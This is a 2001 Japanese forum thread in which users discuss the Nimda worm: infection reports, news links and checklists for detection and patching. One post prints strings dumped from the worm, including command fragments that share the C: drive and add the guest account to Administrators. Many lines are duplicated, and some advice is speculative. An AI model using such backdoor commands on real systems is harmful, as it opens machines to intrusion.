■最悪のウイルス登場MSNが配布 その3■
1 :名無しさん:
最悪のウイルス登場MSNが配布 その2
http://news.2ch.net/test/read.cgi?bbs=news&key=1000861682
MSNにウィルス添付?
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776
セキュリティ板
http://news.2ch.net/test/read.cgi?bbs=news&key=1000867662
http://news.2ch.net/test/read.cgi?bbs=news&key=1000861682
MSNにウィルス添付?
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776
セキュリティ板
http://news.2ch.net/test/read.cgi?bbs=news&key=1000867662
|
|
|
W32ニダ
3 :2:01/09/19 16:27 ID:P4hD3jfg
2げっとだぜ
4 :2:01/09/19 16:27 ID:qRpus5jE
今だ!2番ゲットォォォォ!!
 ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ (´´
∧∧ ) (´⌒(´
⊂(゚Д゚⊂⌒`つ≡≡≡(´⌒;;;≡≡≡
 ̄ ̄ (´⌒(´⌒;;
ズザーーーーーッ
 ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ (´´
∧∧ ) (´⌒(´
⊂(゚Д゚⊂⌒`つ≡≡≡(´⌒;;;≡≡≡
 ̄ ̄ (´⌒(´⌒;;
ズザーーーーーッ
5 : :01/09/19 16:28 ID:Fq3WKD9s
今だ!2番ゲットォォォォ!!
 ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ (´´
∧∧ ) (´⌒(´
⊂(゚Д゚⊂⌒`つ≡≡≡(´⌒;;;≡≡≡
 ̄ ̄ (´⌒(´⌒;;
ズザーーーーーッ
 ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ (´´
∧∧ ) (´⌒(´
⊂(゚Д゚⊂⌒`つ≡≡≡(´⌒;;;≡≡≡
 ̄ ̄ (´⌒(´⌒;;
ズザーーーーーッ
あぼーん
7 : :01/09/19 16:28 ID:zYHPZHs6
>>1
オツカーレサーン
オツカーレサーン
8 : :01/09/19 16:28 ID:34aBkCy.
超ヤバイ。漏れの部署のPC全部やられたっぽい。
2ch見てれば良かった。
2ch見てれば良かった。
9 : :01/09/19 16:28 ID:ku5CKHYE
_ , ― 、
,−' `  ̄ヽ_
,' ヽ
( クソスレ散歩中 )
( ノ`ー'ー'ヽ )
( ノ⌒・ ・⌒( )
( 〉 -――-( )_ _
`ー'l ● ( ノ ヽ )
、‘ー'ー’ _ノ`ー' |
 ̄| ̄ |
/ /7 / ̄ ̄/ /
`ー´ `ー ´ `―´
10 : :01/09/19 16:28 ID:qRpus5jE
今だ!7番ゲットォォォォ!!
 ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ (´´
∧∧ ) (´⌒(´
⊂(゚Д゚⊂⌒`つ≡≡≡(´⌒;;;≡≡≡
 ̄ ̄ (´⌒(´⌒;;
ズザーーーーーッ
 ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ (´´
∧∧ ) (´⌒(´
⊂(゚Д゚⊂⌒`つ≡≡≡(´⌒;;;≡≡≡
 ̄ ̄ (´⌒(´⌒;;
ズザーーーーーッ
11 :1:01/09/19 16:28 ID:UPLKrEJ6
1000取り厨房は新スレ誘導するまで黙ってて欲しかったが…。
12 : :01/09/19 16:29 ID:qRpus5jE
今だ!1000番ゲットォォォォ!!
 ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ (´´
∧∧ ) (´⌒(´
⊂(゚Д゚⊂⌒`つ≡≡≡(´⌒;;;≡≡≡
 ̄ ̄ (´⌒(´⌒;;
ズザーーーーーッ
 ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ (´´
∧∧ ) (´⌒(´
⊂(゚Д゚⊂⌒`つ≡≡≡(´⌒;;;≡≡≡
 ̄ ̄ (´⌒(´⌒;;
ズザーーーーーッ
前スレではじめて1000ゲット。うれしーっす。
14 : :01/09/19 16:30 ID:MxMX74SA
>13
バーカ
バーカ
15 : :01/09/19 16:31 ID:oaR/VUnY
16 : :01/09/19 16:31 ID:zIx9bHqk
ニムダって名前がどこかの国を連想させるな
18 :1:01/09/19 16:32 ID:.cHQDFeM
結局前スレ980が立ててくれなかったからね…。(泣
19 : :01/09/19 16:32 ID:gsbkGkZw
http://www.htsc.ap.titech.ac.jp/member/kawai/test.htm
ここを読めば全てわかります。まとまってるので良い
ここを読めば全てわかります。まとまってるので良い
20 : :01/09/19 16:32 ID:U5DlNbqA
カンコクぽい名前だね=ニムダ
21 : :01/09/19 16:33 ID:/VsGa4no
22 : :01/09/19 16:35 ID:gsbkGkZw
23 : :01/09/19 16:39 ID:.cHQDFeM
初心者スレの方が賑わってるな。
24 :_:01/09/19 16:39 ID:CqzFKTZs
改竄され、踏み台となったwebの一部の一覧
http://headlines.yahoo.co.jp/hl?a=20010919-00000002-vgb-sci
http://headlines.yahoo.co.jp/hl?a=20010919-00000002-vgb-sci
25 : :01/09/19 16:41 ID:1UJ2cJHQ
26 : :01/09/19 16:43 ID:oaR/VUnY
27 : :01/09/19 16:43 ID:m9yCiymc
28 : :01/09/19 16:46 ID:MxMX74SA
29 : :01/09/19 16:48 ID:6741/eko
ウイスルチェッカーをMXで貰ってくるか・・・
31 : :01/09/19 16:51 ID:6741/eko
ウイスルチェッカーをチェックね(w>>30
32 : :01/09/19 16:51 ID:oaR/VUnY
33 : :01/09/19 16:51 ID:wlxnfpFI
SP2にすれば影響ないみたいだけど、Temporary internetfileに、Readme.exeが
落ちていることがあるよ。今日、VB2001を最新にしたら、NIMDA検出しやがった。
一台やられてしまった。。。Systemディレクトリにload.exe追加され、
riched20.dllがオーバーライドされてしまった。これ感染すると、SP2にへも
あげられないのね。とりあえず、SYSTEM.INI書き換えて、File入れ変えたら、
SP2にあげれらるようになったけど。。。これから、VB2001をいれて再チェッ
クだね。
落ちていることがあるよ。今日、VB2001を最新にしたら、NIMDA検出しやがった。
一台やられてしまった。。。Systemディレクトリにload.exe追加され、
riched20.dllがオーバーライドされてしまった。これ感染すると、SP2にへも
あげられないのね。とりあえず、SYSTEM.INI書き換えて、File入れ変えたら、
SP2にあげれらるようになったけど。。。これから、VB2001をいれて再チェッ
クだね。
踏み台にされたWebの80おさわりが 15/h Web 38おさわり。
いやんヴァカ。
いやんヴァカ。
36 : :01/09/19 16:54 ID:.cHQDFeM
37 : :01/09/19 16:56 ID:wlxnfpFI
38 :z61-115-88-213.dialup.wakwak.ne.jp:01/09/19 16:57 ID:vAVHUk8c
暇だ、何かしろ
40 : :01/09/19 16:58 ID:w2RvISP6
まあ、2、3日は2ch以外のサイトに顔を出すな、と。
41 : :01/09/19 16:59 ID:6741/eko
お、CBCでニュースやってる。
42 : :01/09/19 17:01 ID:Y4V/Y4uw
スレ違いだろうけどさ、IE4SP1からIE6に変えたんだよ(win98)
そしたら受信・送信メールが全部消えてんだけど、どっかにバックアップとかとってくれてないのか?
そしたら受信・送信メールが全部消えてんだけど、どっかにバックアップとかとってくれてないのか?
44 :機能盛りだくさん:01/09/19 17:05 ID:GEWbAhZY
TROJ_NIMDA.A詳細情報
http://www.trendmicro.co.jp/virusinfo/nimda.htm
http://www.trendmicro.co.jp/virusinfo/nimda.htm
45 : :01/09/19 17:06 ID:Y4V/Y4uw
46 : :01/09/19 17:06 ID:HNaSrLx.
普段はセキュリティしっかりしてるつもりなんだけど見事にくらっちまった。
win2000をデュアルでインストールし無事完了
↓
とりあえず接続ウィザードでネットワーク設定
↓
設定後自動的にMSNホームへ
↓
当然IEは旧バージョンのまま、スクリプトもON
↓
あぼーん
win2000をデュアルでインストールし無事完了
↓
とりあえず接続ウィザードでネットワーク設定
↓
設定後自動的にMSNホームへ
↓
当然IEは旧バージョンのまま、スクリプトもON
↓
あぼーん
47 : :01/09/19 17:08 ID:xejTGd/A
ZoneAlarmを導入したよ。
Nimdaたんによるものと思われる不正アクセスが続出。
はぁ鬱。
Nimdaたんによるものと思われる不正アクセスが続出。
はぁ鬱。
48 : :01/09/19 17:09 ID:.rGHXqaA
49 : :01/09/19 17:09 ID:R2oSxL3k
質問なんだけど
一回インストールしたIE5.01 SP2って
どこかに残ってなかったっけ?
いちいちダウンロードしてられない。
外出だったらすまそ
一回インストールしたIE5.01 SP2って
どこかに残ってなかったっけ?
いちいちダウンロードしてられない。
外出だったらすまそ
51 :_:01/09/19 17:11 ID:GXd7/OwA
ie5.5 sp2にしたからもう大丈夫かな?
あと、Hサイトのバナーは危険度が増したのか?
あと、Hサイトのバナーは危険度が増したのか?
52 : :01/09/19 17:12 ID:GcqnTF1U
53 : :01/09/19 17:12 ID:FHrIz6Dc
54 : :01/09/19 17:12 ID:e2EuAUw2
ウイルス付メールを受け取った新たなユーザがOutlook ExpressまたはOutlookを利用し、
かつInternet Explorerのセキュリティホールのパッチが適用されていない場合には、
メールを見る(プレビュー機能)だけでウイルスに感染(ダイレクトアクション)します。
引用先 http://www.trendmicro.co.jp/virusinfo/troj_nimda.htm
↑添付ファイルの.exeを実行しなくても
プレビューするだけで感染しちゃうの?怖ええ
かつInternet Explorerのセキュリティホールのパッチが適用されていない場合には、
メールを見る(プレビュー機能)だけでウイルスに感染(ダイレクトアクション)します。
引用先 http://www.trendmicro.co.jp/virusinfo/troj_nimda.htm
↑添付ファイルの.exeを実行しなくても
プレビューするだけで感染しちゃうの?怖ええ
55 :名無しさん:01/09/19 17:13 ID:xd.89Pkw
中見ると、色々やってるね。逆アセンブルした暇人居ない?
winzip32.exeのファイル名が直接入ってるのが気になる。
\wininit.ini
Personal
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
\*.*
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
share c$=c:\
user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
software\microsoft\windows nt\currentversion\perflib\009
software\microsoft\windows nt\currentversion\perflib
winzip32.exeのファイル名が直接入ってるのが気になる。
\wininit.ini
Personal
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
\*.*
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
share c$=c:\
user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
software\microsoft\windows nt\currentversion\perflib\009
software\microsoft\windows nt\currentversion\perflib
>>49
普通にie5setup.exeをダウンロードして実行しただけだと残らないと思いましたが・・
「詳細設定」で「ダウンロードのみ」を指定して必要なファイルのダウンロードだけを
行なっておきましょう。
普通にie5setup.exeをダウンロードして実行しただけだと残らないと思いましたが・・
「詳細設定」で「ダウンロードのみ」を指定して必要なファイルのダウンロードだけを
行なっておきましょう。
57 :31アイスクリーム:01/09/19 17:14 ID:prNHR8MU
58 : :01/09/19 17:15 ID:6741/eko
とりあえず、エロサイトは控えた方がよさげ。
2chはかちゅ〜しゃで見よう。
2chはかちゅ〜しゃで見よう。
59 : :01/09/19 17:15 ID:rhA4bL0E
60 : :01/09/19 17:16 ID:6741/eko
ってか、これもラディンによるテロ行為か?
61 : :01/09/19 17:17 ID:W2q.JldY
62 :マシリト総理 ◆84VbUMtQ :01/09/19 17:19 ID:eKw5kRXU
ワームをバイナリダンプしたらこんなメッセージが入ってた
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
中国製か?こいつ
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
中国製か?こいつ
63 :49:01/09/19 17:19 ID:R2oSxL3k
>>53
ありがとうございます、見つかりました。
>>56
SP2インストールの最後に
「どこどこにsetup.exeがあるからそれクリックすればOK」
みたいなメッセージが出てたような気がしたので。
(そこで控えなかったからこんな質問することに
なってしまった。)
レスありがとう。
どうもお騒がせしました。
ありがとうございます、見つかりました。
>>56
SP2インストールの最後に
「どこどこにsetup.exeがあるからそれクリックすればOK」
みたいなメッセージが出てたような気がしたので。
(そこで控えなかったからこんな質問することに
なってしまった。)
レスありがとう。
どうもお騒がせしました。
64 : :01/09/19 17:22 ID:cYljdLQY
Norton先生は新しい定義ファイル配り始めたの?
65 :nanashi:01/09/19 17:23 ID:twveTs.w
ADSLとかT1回線の奴はウイルスバスターよりNotonのアンチウイルス使った方がいいぞ
ウイルスバスター入れると速度が300Kbps以下に抑制されてしまう
ウイルスバスター入れると速度が300Kbps以下に抑制されてしまう
66 : :01/09/19 17:25 ID:186vJgXg
67 :名無しさん:01/09/19 17:25 ID:t5ePDc5w
既出ならすまんね。
【速報】文部科学省地震調査研究推進本部のホームページにも新種ウイルス「Nimda(ニムダ)」が感染
http://www.jiji.com/cgi-bin/contents.cgi?content=2001091910818&genre=soc
【速報】文部科学省地震調査研究推進本部のホームページにも新種ウイルス「Nimda(ニムダ)」が感染
http://www.jiji.com/cgi-bin/contents.cgi?content=2001091910818&genre=soc
68 :マシリト総理 ◆84VbUMtQ :01/09/19 17:25 ID:eKw5kRXU
おお、winzip32.exeなんてのもある
こいつwinzipにも感染するのか?
こいつwinzipにも感染するのか?
69 : :01/09/19 17:26 ID:Y4V/Y4uw
71 :nanashi:01/09/19 17:30 ID:twveTs.w
72 : :01/09/19 17:30 ID:6aK8UCHs
おー
ノートンアンチヴィルス今日二回目の定義ファイル更新だ。
2回なんて凄いな
ノートンアンチヴィルス今日二回目の定義ファイル更新だ。
2回なんて凄いな
73 : :01/09/19 17:31 ID:6741/eko
さっきからテレヴィの写りが悪いんだが、これもウイスルか?
74 :49:01/09/19 17:32 ID:R2oSxL3k
てことは、朝ダウンロードしたのでは
ダメってことかあ。
せっかくマシン5台も更新したのに(T-T)
75 : :01/09/19 17:33 ID:xKq385SM
これって赤丸みたいにw2kとかNT系に感染じゃなくて9x系にも感染すんの?
76 : :01/09/19 17:32 ID:sTYSsoXk
ここよくまとまっている。朝出勤したら緊急連絡が出てた。
http://staff.aist.go.jp/takagi.hiromitsu/intra/security/alert/20010919-1.html
http://staff.aist.go.jp/takagi.hiromitsu/intra/security/alert/20010919-1.html
1.ブルース・ウイルス 2.ブルース・ウィリス
3.ブルース・ウォルス 4.ブルース・リー
ファイナルアンサー!?
3.ブルース・ウォルス 4.ブルース・リー
ファイナルアンサー!?
79 : :01/09/19 17:35 ID:AoixoLv2
ぞねが1時間で100アタックを検知。
80 : :01/09/19 17:36 ID:/LsUGfPI
81 : :01/09/19 17:36 ID:spzt.8VY
つーかノートンばっかり更新で
ウイルスバスターは更新されてないのか?
ウイルスバスターは更新されてないのか?
82 : :01/09/19 17:37 ID:4YsZA8ZQ
テスト
83 : :01/09/19 17:37 ID:XnheIHJ6
84 :ななな:01/09/19 17:37 ID:/yVXgcOU
ウイルス「Nimda」、農水省や毎日新聞なども感染
http://www.asahi.com/national/update/0919/014.html
http://www.asahi.com/national/update/0919/014.html
85 : :01/09/19 17:38 ID:70eidv3I
86 : :01/09/19 17:38 ID:X3r7FKqI
検知できるんならワクチンも
侵入できるんじゃないですか?
侵入できるんじゃないですか?
87 :( ゚д゚)ゴルァ!:01/09/19 17:39 ID:2Btp1QlY
お昼のおやつに食べたプリンにもMSNが配布したウィルスが入ってたみたい
お腹が痛くなってきたよ( ゚д゚) プリンー!
お腹が痛くなってきたよ( ゚д゚) プリンー!
88 : :01/09/19 17:39 ID:YhkDggS.
どうだ?
89 : :01/09/19 17:39 ID:/LsUGfPI
>>86 ハァ?
90 : :01/09/19 17:39 ID:xejTGd/A
91 :名無し:01/09/19 17:39 ID:GEWbAhZY
92 :名無しさん:01/09/19 17:40 ID:xd.89Pkw
winzip入れてる人は、どんな感染具合か教えてくれよ(´ー`)y-~~
93 :1:01/09/19 17:40 ID:b8GdSDcM
急に人が増えたな…。なんで?
94 :名無しさん:01/09/19 17:41 ID:t5ePDc5w
95 : :01/09/19 17:41 ID:/LsUGfPI
>>93 アフター5?
96 :ななな:01/09/19 17:41 ID:/yVXgcOU
ネット上に強力な新種ウイルス 専門家が警戒呼びかけ
http://www.asahi.com/cnn/0919/cnnj091902.html
http://www.asahi.com/cnn/0919/cnnj091902.html
97 :1:01/09/19 17:44 ID:b8GdSDcM
98 :強制終了!?:01/09/19 17:44 ID:jWxhbmHk
俺は、IE5.5SPだが二日前からIEのエラーでてた。そしてこの情報を
マイクロソフトに送りますか?なんだかわからないダイアログでて
とりあえず送ったけどあれは何だったのだろうか?
みんなでなかった?
マイクロソフトに送りますか?なんだかわからないダイアログでて
とりあえず送ったけどあれは何だったのだろうか?
みんなでなかった?
99 : :01/09/19 17:44 ID:xXC6trQc
ぞねが検知してるアタックはほっといてえーのかな
100 : :01/09/19 17:45 ID:Y4V/Y4uw
101 : :01/09/19 17:45 ID:zsQE2Q3w
102 : :01/09/19 17:46 ID:Y4V/Y4uw
103 : :01/09/19 17:46 ID:186vJgXg
104 : :01/09/19 17:48 ID:VXccxyFg
>>76のリンク先に
>ウィルスプログラム「readme.exe」が添付されたメールをOutlook/Outlook Expressで
>受信すると、添付ファイルを開かなくても、ただそのメールの本文を表示しただけで、
>その添付ファイルが自動的に起動されてしまい、感染する。
って書かれてるけど、これ本当?Outlook Express6でも駄目なの?
本当なら別のメールソフト探さなきゃ・・・
>ウィルスプログラム「readme.exe」が添付されたメールをOutlook/Outlook Expressで
>受信すると、添付ファイルを開かなくても、ただそのメールの本文を表示しただけで、
>その添付ファイルが自動的に起動されてしまい、感染する。
って書かれてるけど、これ本当?Outlook Express6でも駄目なの?
本当なら別のメールソフト探さなきゃ・・・
う・・6.0にアップデートしたら、ほとんどのページが見れなくなってる・・
106 :nanashi:01/09/19 17:49 ID:twveTs.w
ウイルスバスターの速度低下の問題で公式サイトの対策法として
>WebTrapおよびURLフィルタ機能を無効化することで回避できます
とかってあるけどこれじゃホームページ上に仕込まれてる
ウイルスには役に立ってないんじゃ?
>WebTrapおよびURLフィルタ機能を無効化することで回避できます
とかってあるけどこれじゃホームページ上に仕込まれてる
ウイルスには役に立ってないんじゃ?
107 : :01/09/19 17:49 ID:7yygscaQ
■感染チェック
1.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
2.9/19以降にパターンファイルを更新したNortonAntivirus2001でチェック
→readme.exe, readme.emlの感染チェック可能
3.トレンドマイクロのオンラインスキャン実行
http://www.trendmicro.co.jp/hcall/scan.htm
→readme.exeの感染チェック可能
■クライアント側の対処
・ブラウザ 対処方法
IE5.0、5.01、5.02、5.5ユーザ:Windows98/Me/2000用IE5.5SP2へのアップデート
http://www.microsoft.com/downloads/release.asp?releaseid=32082
IE5.0、5.01ユーザ:Windows98/2000用IE5.01SP2へのアップデート
http://www.microsoft.com/downloads/release.asp?ReleaseID=28910
IE6.0の導入
http://www.microsoft.com/windows/ie_intl/ja/download/default.htm
上記以外の人は、アップデート作業を http://windowsupdate.microsoft.com/?IE で行う。
もしくは雑誌等付録のCD-ROMでも可能(かと思われ)
■サーバ側の対処
1. MS社のセキュリティパッチ導入
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078
2.ウィルスチェックソフトのパターンファイル更新
■最低限の常識
・見知らぬファイルのダウンロードや実行は行わない
■参考情報
symantec社 http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
MSN http://help.msn.co.jp/notice.htm
Microsoft社 http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078
1.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
2.9/19以降にパターンファイルを更新したNortonAntivirus2001でチェック
→readme.exe, readme.emlの感染チェック可能
3.トレンドマイクロのオンラインスキャン実行
http://www.trendmicro.co.jp/hcall/scan.htm
→readme.exeの感染チェック可能
■クライアント側の対処
・ブラウザ 対処方法
IE5.0、5.01、5.02、5.5ユーザ:Windows98/Me/2000用IE5.5SP2へのアップデート
http://www.microsoft.com/downloads/release.asp?releaseid=32082
IE5.0、5.01ユーザ:Windows98/2000用IE5.01SP2へのアップデート
http://www.microsoft.com/downloads/release.asp?ReleaseID=28910
IE6.0の導入
http://www.microsoft.com/windows/ie_intl/ja/download/default.htm
上記以外の人は、アップデート作業を http://windowsupdate.microsoft.com/?IE で行う。
もしくは雑誌等付録のCD-ROMでも可能(かと思われ)
■サーバ側の対処
1. MS社のセキュリティパッチ導入
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078
2.ウィルスチェックソフトのパターンファイル更新
■最低限の常識
・見知らぬファイルのダウンロードや実行は行わない
■参考情報
symantec社 http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
MSN http://help.msn.co.jp/notice.htm
Microsoft社 http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078
108 : :01/09/19 17:49 ID:gglfO4L.
どこ回ってもnimda落とせない
欲しいよー
欲しいよー
109 : :01/09/19 17:51 ID:eLtfQVJ6
IEver5.00.2614.3500なんだけど、これは大丈夫?
110 : :01/09/19 17:51 ID:oaR/VUnY
111 : :01/09/19 17:51 ID:aIhiPp5w
シマンテックはもうウイルス定義対策したみたいだね。
心配なら、30日の試用版いれといたらどう?
試用版っていっても日数以外の機能制限ないし。
心配なら、30日の試用版いれといたらどう?
試用版っていっても日数以外の機能制限ないし。
112 : :01/09/19 17:52 ID:7yygscaQ
113 : :01/09/19 17:52 ID:xejTGd/A
114 : :01/09/19 17:52 ID:2gbpsM3s
115 :1:01/09/19 17:52 ID:b8GdSDcM
116 :ななし:01/09/19 17:53 ID:twveTs.w
117 : :01/09/19 17:54 ID:qq6rhHg6
トレンドマイクロに無駄対応
http://www.trendmicro.co.jp/virusinfo/troj_nimda.htm
http://www.trendmicro.co.jp/virusinfo/troj_nimda.htm
118 :仕様書無しさん:01/09/19 17:53 ID:sTYSsoXk
119 :1:01/09/19 17:54 ID:b8GdSDcM
120 : :01/09/19 17:54 ID:7yygscaQ
122 :あ:01/09/19 17:56 ID:Lm/oIebE
ネスケは関係無し?
自動的にコンテンツアドバイザの設定変わったせいか・・?
124 :_:01/09/19 17:56 ID:NPM5a906
朝ノートン更新したんだけど、今さっきもまた更新されてた。
細目ですな。
細目ですな。
125 :1:01/09/19 17:57 ID:b8GdSDcM
126 : :01/09/19 17:59 ID:7yygscaQ
128 : :01/09/19 17:59 ID:VZQ2Xcb6
129 :ななし:01/09/19 17:59 ID:9ocyDVW2
朝、出勤前に最初のスレ見たおかげで職場の人間にアラーム出せたよ。ありがとう。
っと思ったら、メール読んだだけで感染するのか?そこまで言わずに帰ってしまったよ…。くそっ!
っと思ったら、メール読んだだけで感染するのか?そこまで言わずに帰ってしまったよ…。くそっ!
130 : :01/09/19 17:59 ID:w78lW11I
すんません、ノートンの更新ってどうすればいいんですか?
教えてちゃんですいません。
教えてちゃんですいません。
132 : :01/09/19 18:01 ID:7yygscaQ
133 : :01/09/19 18:01 ID:7yygscaQ
マジで被害者全員による石投げの刑にしてやりてぇ・・
135 :130:01/09/19 18:04 ID:w78lW11I
137 : :01/09/19 18:06 ID:OogSJQVg
ヤフーもグーグルもアクセスできないよ
なんで?
ここはできるのに。ウィルスの影響?
なんで?
ここはできるのに。ウィルスの影響?
138 : :01/09/19 18:06 ID:7yygscaQ
139 : :01/09/19 18:07 ID:VXccxyFg
141 : :01/09/19 18:07 ID:w78lW11I
LiveUpdateは見つかったんだけどどう実行すればいいのでしょう。
初心者なんでわかりません・・・。
初心者なんでわかりません・・・。
142 : :01/09/19 18:08 ID:RBfX97tE
JOKE_BUTTONS トロイの木馬型
このウィルスって、何ですか?
このウィルスって、何ですか?
143 : :01/09/19 18:08 ID:jhDeJex2
144 :137:01/09/19 18:10 ID:OogSJQVg
>>140
失礼しました。
いや、僕はマックなんで問題ないんですが、
なぜかヤフーもグーグルもエキサイトもアクセスが
できない。
ここでも、速報板以外見れない。
メールは問題なく使えるからネットワークは
正常のようなので、なにか他に原因でもあるのかと
思ったのです。
失礼しました。
いや、僕はマックなんで問題ないんですが、
なぜかヤフーもグーグルもエキサイトもアクセスが
できない。
ここでも、速報板以外見れない。
メールは問題なく使えるからネットワークは
正常のようなので、なにか他に原因でもあるのかと
思ったのです。
145 : :01/09/19 18:10 ID:KQPItnUE
IE5.5の2いれたよ〜。1時間近くかかって、なんかページの移動が
早くなった気がする。これでOK?
早くなった気がする。これでOK?
146 : :01/09/19 18:10 ID:8MvljIUI
ニュースでやってるな。
147 :い:01/09/19 18:11 ID:GcyZ/PSE
ニュスでたあげ
148 : :01/09/19 18:11 ID:8MvljIUI
もう終わりかよ!
150 :私、めったに感染しないのに:01/09/19 18:11 ID:kYae1k7A
Unix.Penguin
Harakiri
今日に限ってこんなんに感染してた。
Harakiri
今日に限ってこんなんに感染してた。
151 :初心者:01/09/19 18:12 ID:Y9JO5itw
アンチウイルスで調べたら
w32nimda@mm(html)って名前のウイルスが
3個あったらしくて今検疫所にいます。
とりあえずこれで安心なんでしょうか?
どなたか教えてください。
w32nimda@mm(html)って名前のウイルスが
3個あったらしくて今検疫所にいます。
とりあえずこれで安心なんでしょうか?
どなたか教えてください。
152 :ぺ ◆lPYiMAEY :01/09/19 18:12 ID:1xVp6UNk
日テレでは結構詳しくやっていたけど、最後に幻滅。
「身に覚えのないメールを開かないなどの対策が必要です」
それだけですかい、日テレさん(w
「身に覚えのないメールを開かないなどの対策が必要です」
それだけですかい、日テレさん(w
153 : :01/09/19 18:13 ID:186vJgXg
154 : :01/09/19 18:13 ID:8MvljIUI
今他の人ってなにで見てる?
IE?かちゅ?
IE?かちゅ?
155 : :01/09/19 18:14 ID:cYljdLQY
今日の朝14件から18件で
明日になったら1800件かもっていったけど、マジだね。それ以上かも。
明日になったら1800件かもっていったけど、マジだね。それ以上かも。
156 : ◆S1o.kilU :01/09/19 18:14 ID:8OgXcCzk
ナッチポンプずら??
157 : :01/09/19 18:14 ID:xKq385SM
>初心者
ねぇ。ここはネットだよ?
自分で検索とかしなよ。人にばっか聞いてないでさ。
はっきりいってうざいよ。
アンチウィルスの説明書持ってるでしょ?
サポートセンターとかに問い合わせるとか。
できないような事情でもあるの?
ねぇ。ここはネットだよ?
自分で検索とかしなよ。人にばっか聞いてないでさ。
はっきりいってうざいよ。
アンチウィルスの説明書持ってるでしょ?
サポートセンターとかに問い合わせるとか。
できないような事情でもあるの?
158 : :01/09/19 18:15 ID:w78lW11I
>149
マニュアルないんですよ・・・。
だって自分で入れたんじゃなくて、親が勝手に入れてったんだもん・・・。
マニュアルないんですよ・・・。
だって自分で入れたんじゃなくて、親が勝手に入れてったんだもん・・・。
159 : :01/09/19 18:15 ID:cYljdLQY
160 : :01/09/19 18:15 ID:yAHnr2Qo
テンポラリーファイルに3つほどREADME.exeが入ってんだけど
普通に消していいの?
マジで教えて
普通に消していいの?
マジで教えて
161 : :01/09/19 18:15 ID:7yygscaQ
多分、このウィルス(ワーム)は過去最大の感染者を出す事になると思われ。
162 : :01/09/19 18:16 ID:/Btmv0Ik
163 :定期コピペ用:01/09/19 18:16 ID:cYljdLQY
W32.Nimda.A@mm、とりあえずの対策(気休め)
・まず感染の確認
その1:readme.exeやreadme.eml、MEP*.TMP.EXEで検索をかける(ローカルハードドライブを選択すること)
なお、readme.exeでWAVファイルみたいになっているものもワーム。
また、OutlookExpress系のメーラーでは送受信メールの拡張子が*.emlなので、
emlが出たからと言って必ずしも感染しているとは限らない。
その2:Cドライブがネットワーク共有を勝手にされていたら感染している
その3:システムがスローダウン、いつもよりも明らかに遅く、しかもやたらネットにアクセスしまくる場合も感染している疑い濃厚。
・対処法
現在のところ不明。
感染ファイルを削除しても、既に正当なWindows DLLとRICHED20.DLLを置き換えているのでムダ。
また、感染後にIE5.5SP2などにしても意味なし。
・感染している場合
レジストリの
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
以下にある実行ファイルに感染している。
・自己防衛法
IE5.5SP1かSP2にバージョンアップする(ただしダウンロードに非常に時間がかかる)
JavaScriptをOFFにしておく(直接リンクしてしまった場合はやはり実行されてしまうので注意)
あやしげなメールが来ても開かない(README.EXEという添付ファイルは絶対にクリックしない)
駆除ツールを使う(まだ出てない…)
NetscapeNavigatorにする(何か間違ってる…)
・まず感染の確認
その1:readme.exeやreadme.eml、MEP*.TMP.EXEで検索をかける(ローカルハードドライブを選択すること)
なお、readme.exeでWAVファイルみたいになっているものもワーム。
また、OutlookExpress系のメーラーでは送受信メールの拡張子が*.emlなので、
emlが出たからと言って必ずしも感染しているとは限らない。
その2:Cドライブがネットワーク共有を勝手にされていたら感染している
その3:システムがスローダウン、いつもよりも明らかに遅く、しかもやたらネットにアクセスしまくる場合も感染している疑い濃厚。
・対処法
現在のところ不明。
感染ファイルを削除しても、既に正当なWindows DLLとRICHED20.DLLを置き換えているのでムダ。
また、感染後にIE5.5SP2などにしても意味なし。
・感染している場合
レジストリの
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
以下にある実行ファイルに感染している。
・自己防衛法
IE5.5SP1かSP2にバージョンアップする(ただしダウンロードに非常に時間がかかる)
JavaScriptをOFFにしておく(直接リンクしてしまった場合はやはり実行されてしまうので注意)
あやしげなメールが来ても開かない(README.EXEという添付ファイルは絶対にクリックしない)
駆除ツールを使う(まだ出てない…)
NetscapeNavigatorにする(何か間違ってる…)
164 : :01/09/19 18:16 ID:7yygscaQ
165 : :01/09/19 18:17 ID:GcqnTF1U
166 : :01/09/19 18:17 ID:186vJgXg
167 : :01/09/19 18:18 ID:7PIOAoLY
スキャンしたらVBS.Haptime.A@mmとかいうウイルスに感染してた
このウイルスは何?
このウイルスは何?
168 : :01/09/19 18:18 ID:jhDeJex2
CodeRedみたいに外にアクセスしまくる活動をするなら、
netstatを見ることで分かるかもしれない。
netstatを見ることで分かるかもしれない。
169 :名無しさん23:01/09/19 18:18 ID:GcqnTF1U
170 : :01/09/19 18:20 ID:7yygscaQ
171 : :01/09/19 18:20 ID:0mosGLcI
